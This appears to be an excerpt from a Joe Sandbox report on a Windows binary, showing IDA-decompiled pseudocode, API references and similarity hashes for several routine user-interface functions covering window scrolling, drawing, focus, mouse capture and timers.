				_v8 = _t30 ^ _t59;
				_t46 = _a12;
				_t58 = __ecx;
				_v28 = _t46;
				_t55 = _a16;
				if(IsWindowVisible( *(__ecx + 0x20)) != 0 || _t46 != 0 || _t55 != 0) {
					_t33 = ScrollWindow( *(_t58 + 0x20), _a4, _a8, _t46, _t55);
				} else {
					_t57 = GetWindow( *(_t58 + 0x20), 5);
					if(_t57 != 0) {
						_t47 = _a8;
						do {
							_v24.left = _v24.left & 0x00000000;
							_v24.top = _v24.top & 0x00000000;
							_v24.right = _v24.right & 0x00000000;
							_v24.bottom = _v24.bottom & 0x00000000;
							GetWindowRect(_t57,  &_v24);
							E00CBA172(_t58,  &_v24);
							SetWindowPos(_t57, 0, _v24.left + _a4, _v24.top + _t47, 0, 0, 0x15);
							_t57 = GetWindow(_t57, 2);
						} while (_t57 != 0);
						_t46 = _v28;
					}
				}
				_t56 =  *((intOrPtr*)(_t58 + 0x70));
				if(_t56 != 0 && _t46 == 0) {
					_t58 =  *((intOrPtr*)( *_t56 + 0x5c));
					 *0xe17a64(_a4, _a8);
					_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_t56 + 0x5c))))();
				}
				return E00DDCBCE(_t33, _t46, _v8 ^ _t59, 0, _t56, _t58);
			}

0x00cb51d6
0x00cb51dd
0x00cb51e1
0x00cb51e5
0x00cb51e7
0x00cb51eb
0x00cb51f9
0x00cb5277
0x00cb5203
0x00cb520e
0x00cb5212
0x00cb5214
0x00cb5217
0x00cb5217
0x00cb521e
0x00cb5222
0x00cb5226
0x00cb522c
0x00cb5238
0x00cb5252
0x00cb5261
0x00cb5263
0x00cb5267
0x00cb5267
0x00cb5212
0x00cb527d
0x00cb5282
0x00cb5290
0x00cb5295
0x00cb529d
0x00cb529d
0x00cb52ad

APIs

IsWindowVisible.USER32(?), ref: 00CB51F1
GetWindow.USER32(?,00000005), ref: 00CB5208
GetWindowRect.USER32 ref: 00CB522C

Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA181
Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA18E

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 00CB5252
GetWindow.USER32(00000000,00000002), ref: 00CB525B
ScrollWindow.USER32 ref: 00CB5277

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: 3ce6350db47218f2fbd4e267d6645b40235dd861d1a39053a0cfc8bd65328fa5
Instruction ID: b9c7f08b048f3d5b257849d32323d2c4872a9553c70b11a5974a2f20d8129931
Opcode Fuzzy Hash: 3ce6350db47218f2fbd4e267d6645b40235dd861d1a39053a0cfc8bd65328fa5
Instruction Fuzzy Hash: 48318976600A09AFDB01DFA5CC88BBF7BBAFF98711F108019F955A7251DB309E048B61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8AB2 Relevance: 9.1, APIs: 6, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CD8AB2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t45;
				struct HWND__* _t50;
				struct tagPOINT* _t54;
				intOrPtr _t64;
				signed int _t66;
				intOrPtr _t67;
				void* _t76;
				intOrPtr _t79;
				void* _t80;

				_t76 = __edx;
				_push(0x18);
				E00DDD52C(0xe0a44d, __ebx, __edi, __esi);
				 *(_t80 - 0x20) =  *(_t80 - 0x20) & 0x00000000;
				 *((intOrPtr*)(_t80 - 0x24)) = 0xe1a644;
				 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
				_t79 =  *((intOrPtr*)(_t80 + 0xc));
				if( *(_t80 + 0x10) != 0) {
					E00CB9BC6(__ebx, _t80 - 0x24, __edi, CreateRectRgnIndirect( *(_t80 + 0x10)));
					_t68 = _t79;
					E00CBA1B1(_t79, _t80 - 0x24);
				}
				_t64 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t80 - 0x10)) = E00CB277F(_t64, _t68, _t76, GetParent( *(_t64 + 0x20)));
				if(_t79 != 0) {
					_t45 =  *(_t79 + 4);
				} else {
					_t45 = 0;
				}
				__imp__DrawThemeParentBackground( *(_t64 + 0x20), _t45,  *(_t80 + 0x10));
				_t66 = 0 | _t45 == 0x00000000;
				if(_t45 != 0) {
					 *(_t80 - 0x1c) =  *(_t80 - 0x1c) & 0x00000000;
					 *(_t80 - 0x18) =  *(_t80 - 0x18) & 0x00000000;
					_t67 =  *((intOrPtr*)(_t80 - 0x10));
					if(_t67 != 0) {
						_t50 =  *(_t67 + 0x20);
					} else {
						_t50 = 0;
					}
					MapWindowPoints( *( *((intOrPtr*)(_t80 + 8)) + 0x20), _t50, _t80 - 0x1c, 1);
					_t54 = E00CB9FE0(_t79, _t80 - 0x14,  *(_t80 - 0x1c),  *(_t80 - 0x18));
					 *(_t80 - 0x1c) =  *_t54;
					 *(_t80 - 0x18) = _t54->y;
					_t66 = SendMessageA( *(_t67 + 0x20), 0x14,  *(_t79 + 4), 0);
					E00CBA5F8(_t79, _t80 - 0x14,  *(_t80 - 0x1c),  *(_t80 - 0x18));
				}
				E00CBA1B1(_t79, 0);
				 *((intOrPtr*)(_t80 - 0x24)) = 0xe1a644;
				E00CB91F0(_t80 - 0x24, _t76);
				return E00DDD4FA(_t66);
			}

0x00cd8ab2
0x00cd8ab2
0x00cd8ab9
0x00cd8abe
0x00cd8ac2
0x00cd8ac9
0x00cd8ad1
0x00cd8ad4
0x00cd8ae3
0x00cd8aeb
0x00cd8aee
0x00cd8aee
0x00cd8af3
0x00cd8b05
0x00cd8b0a
0x00cd8b10
0x00cd8b0c
0x00cd8b0c
0x00cd8b0c
0x00cd8b1a
0x00cd8b24
0x00cd8b29
0x00cd8b2b
0x00cd8b2f
0x00cd8b33
0x00cd8b38
0x00cd8b3e
0x00cd8b3a
0x00cd8b3a
0x00cd8b3a
0x00cd8b4e
0x00cd8b60
0x00cd8b74
0x00cd8b77
0x00cd8b83
0x00cd8b8e
0x00cd8b8e
0x00cd8b97
0x00cd8b9f
0x00cd8ba6
0x00cd8bb2

APIs

__EH_prolog3.LIBCMT ref: 00CD8AB9
CreateRectRgnIndirect.GDI32(00000000), ref: 00CD8AD9

Part of subcall function 00CBA1B1: SelectClipRgn.GDI32(?,00000000), ref: 00CBA1D5
Part of subcall function 00CBA1B1: SelectClipRgn.GDI32(?,00000000), ref: 00CBA1ED

GetParent.USER32(?), ref: 00CD8AF9
DrawThemeParentBackground.UXTHEME(?,00000000,00000000,00000000,?,?,00000018,00CC5F69,?,?,?), ref: 00CD8B1A
MapWindowPoints.USER32 ref: 00CD8B4E
SendMessageA.USER32(?,00000014,00000000,00000000), ref: 00CD8B7A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClipParentSelect$BackgroundCreateDrawH_prolog3IndirectMessagePointsRectSendThemeWindow
String ID:
API String ID: 935984306-0
Opcode ID: fd773cbaa7f234e0de0f0e4641bfe9c9e9d573b066c22335d96a1dfb5d37e6b5
Instruction ID: c02ca0796a32df068d0eca509e59386c8bf1f8753b2a38f336411e98a6d83fd7
Opcode Fuzzy Hash: fd773cbaa7f234e0de0f0e4641bfe9c9e9d573b066c22335d96a1dfb5d37e6b5
Instruction Fuzzy Hash: F4312E71A0020AEFCF10DFA0CC5ABEE7BB5FF18701F104459F655AA261DB759A08DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA1F0 Relevance: 9.1, APIs: 6, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CCA1F0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				intOrPtr _t31;
				int _t39;
				void* _t42;
				void* _t60;
				void* _t64;
				void* _t65;

				_t60 = __edx;
				_push(0xc);
				E00DDD52C(0xe09731, __ebx, __edi, __esi);
				_t64 = __ecx;
				_t25 = E00CB7881(__ecx);
				if(_t25 != 0) {
					__eflags =  *((intOrPtr*)(_t64 + 0x7b0));
					if(__eflags == 0) {
						E00CAFF34( *((intOrPtr*)(E00CACEEE(__ebx, 0, _t64, __eflags) + 4)));
						 *((intOrPtr*)(_t65 - 4)) = 0;
						_push( *((intOrPtr*)(_t64 + 0x7b8)) - 0x10);
						_t31 = E00CA68F8(__ebx, 0, _t64) + 0x10;
						 *((intOrPtr*)(_t65 - 0x14)) = _t31;
						 *((char*)(_t65 - 4)) = 1;
						__eflags =  *((intOrPtr*)(_t31 - 0xc));
						if(__eflags == 0) {
							E00CB2D00(_t64, _t65 - 0x14);
						}
						_push(_t65 - 0x14);
						_push(_t64 + 0x7bc);
						_push(_t65 - 0x18);
						E00CA2975(ShellExecuteA(0, 0,  *(E00CC2389(1, 0, _t64, __eflags)), 0, 0, 1),  *((intOrPtr*)(_t65 - 0x18)) - 0x10);
						 *((intOrPtr*)(_t64 + 0x7b4)) = 1;
						 *((intOrPtr*)(_t64 + 0xbc)) = 0;
						InvalidateRect( *(_t64 + 0x20), 0, 1);
						_t39 = UpdateWindow( *(_t64 + 0x20));
						__eflags =  *((intOrPtr*)(_t65 - 0x14)) + 0xfffffff0;
						E00CA2975(_t39,  *((intOrPtr*)(_t65 - 0x14)) + 0xfffffff0);
						E00CB0895(_t65 - 0xd, _t60, __eflags);
						_t42 = 1;
					} else {
						 *((intOrPtr*)(_t64 + 0xbc)) = 0;
						InvalidateRect( *(_t64 + 0x20), 0, 1);
						UpdateWindow( *(_t64 + 0x20));
						_t42 = 0;
					}
				} else {
					_t42 = _t25 + 1;
				}
				return E00DDD4FA(_t42);
			}

0x00cca1f0
0x00cca1f0
0x00cca1f7
0x00cca1fc
0x00cca1fe
0x00cca205
0x00cca20f
0x00cca215
0x00cca241
0x00cca24f
0x00cca252
0x00cca258
0x00cca25c
0x00cca262
0x00cca265
0x00cca268
0x00cca270
0x00cca270
0x00cca278
0x00cca27f
0x00cca283
0x00cca29f
0x00cca2a9
0x00cca2af
0x00cca2b5
0x00cca2be
0x00cca2c7
0x00cca2ca
0x00cca2d2
0x00cca2d7
0x00cca217
0x00cca21d
0x00cca223
0x00cca22c
0x00cca232
0x00cca232
0x00cca207
0x00cca207
0x00cca207
0x00cca2de

APIs

__EH_prolog3.LIBCMT ref: 00CCA1F7

Part of subcall function 00CB7881: IsWindowEnabled.USER32(?), ref: 00CB788C

InvalidateRect.USER32(?,00000000,00000001,0000000C), ref: 00CCA223
UpdateWindow.USER32(?), ref: 00CCA22C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$EnabledH_prolog3InvalidateRectUpdate
String ID:
API String ID: 262192325-0
Opcode ID: d13fd8269d319fef13c44451048b7d6ba26ab9822164470fb0864cf397d75516
Instruction ID: 7fd620afe9706ac5ea163eeac902fc0464c31b6dfe30cf020e94aeb7fe10cd05
Opcode Fuzzy Hash: d13fd8269d319fef13c44451048b7d6ba26ab9822164470fb0864cf397d75516
Instruction Fuzzy Hash: 5A217C71804205AFCB20AFB5CC49EAFBBB9FF85304B00452DF09AA6261DB319904EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00D7D2C1 Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00D7D2C1(intOrPtr* __ecx, void* __edx) {
				char _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t17;
				void* _t31;
				intOrPtr* _t33;
				void* _t57;
				intOrPtr* _t59;
				void* _t62;
				signed int _t65;

				_t57 = __edx;
				_push(0xffffffff);
				_push(0xe08181);
				_push( *[fs:0x0]);
				_push(_t33);
				_t17 =  *0xe68dd4; // 0x8d2643c2
				_push(_t17 ^ _t65);
				_t19 =  &_v16;
				 *[fs:0x0] =  &_v16;
				_t59 = __ecx;
				 *__ecx = 0xe2e5f0;
				while(1) {
					L3:
					_t62 = _t59 + 0x510;
					while( *((intOrPtr*)(_t59 + 0x51c)) != 0) {
						_t33 = E00CB806B(_t33, _t62, _t59);
						__eflags = _t33;
						if(_t33 != 0) {
							 *0xe17a64(1);
							_t19 =  *((intOrPtr*)( *((intOrPtr*)( *_t33 + 4))))();
							goto L3;
						}
					}
					E00CA2975(_t19,  *((intOrPtr*)(_t59 + 0x53c)) - 0x10);
					E00CA2975(E00CA2975(E00CC0BC4(_t62),  *((intOrPtr*)(_t59 + 0x4ec)) - 0x10),  *((intOrPtr*)(_t59 + 0x4e8)) - 0x10);
					E00CD7D2E(_t33, _t59 + 0x468, _t57);
					E00DC8C15(_t33, _t59 + 0x328, _t57,  *((intOrPtr*)(_t59 + 0x4e8)) - 0x10);
					E00CD7D2E(_t33, _t59 + 0x2a8, _t57);
					E00CD7DC2(_t33, _t59 + 0x228, _t57);
					E00CD7EA0(_t33, _t59 + 0x1a8, _t57);
					E00CD7D2E(_t33, _t59 + 0x128, _t57);
					E00CD7D2E(_t33, _t59 + 0xa8, _t57);
					_t31 = E00CBCFC2(_t33, _t59, _t57);
					 *[fs:0x0] = _v16;
					return _t31;
				}
			}

0x00d7d2c1
0x00d7d2c4
0x00d7d2c6
0x00d7d2d1
0x00d7d2d2
0x00d7d2d5
0x00d7d2dc
0x00d7d2dd
0x00d7d2e0
0x00d7d2e6
0x00d7d2e8
0x00d7d310
0x00d7d310
0x00d7d310
0x00d7d316
0x00d7d2f7
0x00d7d2f9
0x00d7d2fb
0x00d7d306
0x00d7d30e
0x00000000
0x00d7d30e
0x00d7d2fb
0x00d7d328
0x00d7d34b
0x00d7d356
0x00d7d361
0x00d7d36c
0x00d7d377
0x00d7d382
0x00d7d38d
0x00d7d398
0x00d7d39f
0x00d7d3a7
0x00d7d3b3
0x00d7d3b3

APIs

Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D356
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D36C
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D377
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D382
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D38D
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00D7D398

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ContextExternal$BaseBase::~Concurrency::details::
String ID:
API String ID: 1690591649-0
Opcode ID: 86a06f5475e6db3a536c908524f0ba2596b52da442d42c1795e52bd9fc1fc051
Instruction ID: 97d0407ec05a630e47eaf7c2d3a668343687212bd46016ad1e8439c556f78572
Opcode Fuzzy Hash: 86a06f5475e6db3a536c908524f0ba2596b52da442d42c1795e52bd9fc1fc051
Instruction Fuzzy Hash: 06218B32304916AFD708EB78D8A1BEEF366FF45710F40062DE51A57282EF306A06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CC64EA Relevance: 9.1, APIs: 6, Instructions: 56
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CC64EA(void* __ecx, void* __edx) {
				void* __ebx;
				int _t17;
				void* _t31;
				void* _t32;

				_t31 = __edx;
				_t27 = __ecx;
				_t32 = __ecx;
				_t26 = 0;
				if( *((intOrPtr*)(__ecx + 0xa0)) == 0) {
					 *((intOrPtr*)(__ecx + 0xac)) = 1;
					 *((intOrPtr*)(__ecx + 0xb0)) = 1;
					 *((intOrPtr*)(__ecx + 0xb4)) = 1;
					__eflags =  *(__ecx + 0xb8);
					if( *(__ecx + 0xb8) == 0) {
						E00CB277F(0, _t27, _t31, SetCapture( *(__ecx + 0x20)));
						 *((intOrPtr*)(_t32 + 0xb8)) = 1;
					}
					InvalidateRect( *(_t32 + 0x20), _t26, 1);
					UpdateWindow( *(_t32 + 0x20));
					_t17 =  *(_t32 + 0xdc);
					__eflags = _t17;
					if(__eflags > 0) {
						SetTimer( *(_t32 + 0x20), 0xec0d, _t17, _t26);
					}
				} else {
					_t26 = E00CB277F(0, _t27, _t31, GetParent( *(__ecx + 0x20)));
					_t37 = _t26;
					if(_t26 != 0) {
						SendMessageA( *(_t26 + 0x20), 0x111, E00CB7697(_t32) & 0x0000ffff,  *(_t32 + 0x20));
					}
				}
				return E00CB236A(_t26, _t32, _t37);
			}

0x00cc64ea
0x00cc64ea
0x00cc64ed
0x00cc64ef
0x00cc64f7
0x00cc6530
0x00cc6536
0x00cc653c
0x00cc6542
0x00cc6548
0x00cc6554
0x00cc6559
0x00cc6559
0x00cc6564
0x00cc656d
0x00cc6573
0x00cc6579
0x00cc657b
0x00cc6587
0x00cc6587
0x00cc64f9
0x00cc6508
0x00cc650a
0x00cc650c
0x00cc6525
0x00cc6525
0x00cc650c
0x00cc6597

APIs

GetParent.USER32(?), ref: 00CC64FC

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

SendMessageA.USER32(?,00000111,?,?), ref: 00CC6525
SetCapture.USER32(?), ref: 00CC654D
InvalidateRect.USER32(?,00000000,00000001), ref: 00CC6564
UpdateWindow.USER32(?), ref: 00CC656D
SetTimer.USER32(?,0000EC0D,?,00000000), ref: 00CC6587

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureCtrlInvalidateMessageParentRectSendTimerUpdateWindow
String ID:
API String ID: 171814724-0
Opcode ID: 6f7a923c9c51eb8304926f4db58e67d6e86af1ab1f98652b0d169c524654c192
Instruction ID: 5e756adf8859fd61bcb983969b6590c14dc674cfa3eb84737a2470baa334c92b
Opcode Fuzzy Hash: 6f7a923c9c51eb8304926f4db58e67d6e86af1ab1f98652b0d169c524654c192
Instruction Fuzzy Hash: CC115171314612BFD7081F75CC88EA6BABAFF08711F104229F59991531CB715820DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB82F1 Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CB82F1(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t7;
				struct HWND__* _t9;

				_t3 = GetFocus();
				_t7 = _t3;
				if(_t7 != 0) {
					_t9 = _a4;
					if(_t7 == _t9) {
						L9:
						return _t3;
					}
					if(E00CB8636(_t7, 3) != 0) {
						L5:
						if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t7, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								goto L9;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t7);
					_t7 = _t3;
					if(_t7 == _t9) {
						goto L9;
					}
					_t3 = E00CB8636(_t7, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}

0x00cb82f5
0x00cb82fb
0x00cb82ff
0x00cb8302
0x00cb8307
0x00cb8365
0x00000000
0x00cb8365
0x00cb8313
0x00cb832e
0x00cb8330
0x00cb8355
0x00cb835f
0x00000000
0x00cb8342
0x00cb8343
0x00cb834b
0x00cb8353
0x00000000
0x00000000
0x00000000
0x00cb8353
0x00cb8330
0x00cb8316
0x00cb831c
0x00cb8320
0x00000000
0x00000000
0x00cb8325
0x00cb832c
0x00000000
0x00000000
0x00000000
0x00cb832c
0x00cb8368

APIs

GetFocus.USER32 ref: 00CB82F5

Part of subcall function 00CB8636: GetWindowLongA.USER32 ref: 00CB8651
Part of subcall function 00CB8636: GetClassNameA.USER32(?,?,0000000A), ref: 00CB8666
Part of subcall function 00CB8636: CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00CB867D

GetParent.USER32(00000000), ref: 00CB8316
GetWindowLongA.USER32 ref: 00CB8335
GetParent.USER32(?), ref: 00CB8343
GetDesktopWindow.USER32 ref: 00CB834B
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00CB835F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
String ID:
API String ID: 1233893325-0
Opcode ID: be544994a42ffc2df62e65763e3a72e1cc08cc8e0dbc7ebd12cbbae013c69f38
Instruction ID: 24b884de302722f071d92b18257146976445a62252549f9262a46c0dfe531370
Opcode Fuzzy Hash: be544994a42ffc2df62e65763e3a72e1cc08cc8e0dbc7ebd12cbbae013c69f38
Instruction Fuzzy Hash: DAF0A9321446202BD6321B2D9C0DBFE72FD9B85FB1F054024F911B21E8EF24DD49D590

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE400 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CCE400(intOrPtr* __ecx, void* __edx) {
				intOrPtr* _v16;
				void* __ebx;
				void* __edi;
				intOrPtr __esi;
				struct HWND__* _t31;
				struct HWND__* _t32;
				struct HWND__* _t40;
				struct HWND__* _t46;
				void* _t63;
				void* _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				struct HWND__* _t71;
				void* _t74;
				struct HWND__* _t77;
				void* _t85;

				_t63 = __edx;
				_t50 = __ecx;
				_push(_t74);
				_t66 = __ecx;
				_t89 =  *((intOrPtr*)(__ecx + 0x388));
				if( *((intOrPtr*)(__ecx + 0x388)) != 0) {
					__eax = E00CD1D16(__ebx, __ecx, __edx, __edi, __esi, __eflags, 0xffffffff);
					__esi =  *((intOrPtr*)(__edi + 0x20));
					 *((intOrPtr*)(__edi + 0x388)) = 0;
					__eax = GetCapture();
					__eflags = __eax - __esi;
					if(__eax == __esi) {
						__eax = ReleaseCapture();
					}
				}
				__eflags =  *(_t66 + 0x38c);
				if(__eflags != 0) {
					E00CD1C42(_t66, _t63, __eflags, 0x80000000);
					 *(_t66 + 0x38c) = 0;
					_t46 = GetCapture();
					__eflags = _t46 -  *((intOrPtr*)(_t66 + 0x20));
					if(_t46 ==  *((intOrPtr*)(_t66 + 0x20))) {
						ReleaseCapture();
					}
				}
				_t75 =  *((intOrPtr*)(_t66 + 0x20));
				__eflags = GetCapture() -  *((intOrPtr*)(_t66 + 0x20));
				if(__eflags == 0) {
					ReleaseCapture();
				}
				E00D22D74(0, _t66 + 0x1d8, _t75, __eflags);
				 *0xe17a64();
				 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x188))))();
				_t50 = _t66;
				_t66 = 1;
				_pop(_t74);
				_pop(0);
				_push(_t74);
				_t67 = _t50;
				_t64 = E00CADB0E(0, 0xe681ec, _t67, _t74, _t89, E00CAA535, _t66);
				if(_t64 == 0) {
					E00CAA4E7(0, 0xe681ec, _t67, _t74, __eflags);
					asm("int3");
					_push(_t74);
					_push(_t67);
					_t77 = 0;
					_t31 =  *0x00E6820C;
					__eflags = _t31;
					if(__eflags != 0) {
						L7:
						_push(_t77);
						_t32 = E00CB647F(0, 0xe681ec, _t64, 0xe681ec, _t77, __eflags);
						__eflags = _t32;
						if(__eflags == 0) {
							E00CAA4E7(0, 0xe681ec, 0xe681ec, _t77, __eflags);
							asm("int3");
							 *0xe17a64(0, 0xe681ec, _t77, _t85);
							return  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 4))))();
						} else {
							_push( *0x00E6820C);
							_t9 = _t32 + 0x1c; // 0x1c
							E00CAF874(0, _t9, _t64);
							_t31 =  *0x00E6820C;
							__eflags = _t31;
							if(_t31 != 0) {
								goto L10;
							} else {
								goto L9;
							}
							goto L14;
						}
					} else {
						__eflags =  *0x00E68260;
						if( *0x00E68260 == 0) {
							L15:
							return _t31;
						} else {
							__eflags = _t31;
							if(__eflags == 0) {
								L9:
								__eflags =  *0x00E68260 - _t77;
								if( *0x00E68260 != _t77) {
									L10:
									_t71 =  *0x00E68260;
									__eflags = _t71;
									if(_t71 != 0) {
										 *0xe17a64();
										_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t71->i + 0x58))))();
									} else {
										_t40 = DestroyWindow(_t31);
									}
									_t77 = _t40;
								}
								L14:
								_t31 = _t77;
								goto L15;
							} else {
								goto L7;
							}
						}
					}
				} else {
					 *0xe17a64( *((intOrPtr*)(_t64 + 0x5c)),  *((intOrPtr*)(_t64 + 0x60)),  *((intOrPtr*)(_t64 + 0x64)));
					return  *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x11c))))();
				}
			}

0x00cce400
0x00cce400
0x00cce401
0x00cce403
0x00cce407
0x00cce40d
0x00cce411
0x00cce416
0x00cce419
0x00cce41f
0x00cce425
0x00cce427
0x00cce429
0x00cce429
0x00cce427
0x00cce42f
0x00cce435
0x00cce43e
0x00cce446
0x00cce44c
0x00cce452
0x00cce454
0x00cce456
0x00cce456
0x00cce454
0x00cce45c
0x00cce465
0x00cce467
0x00cce469
0x00cce469
0x00cce475
0x00cce486
0x00cce48e
0x00cce490
0x00cce492
0x00cce493
0x00cce494
0x00cb236a
0x00cb236c
0x00cb237d
0x00cb2381
0x00cb23a3
0x00cb23a8
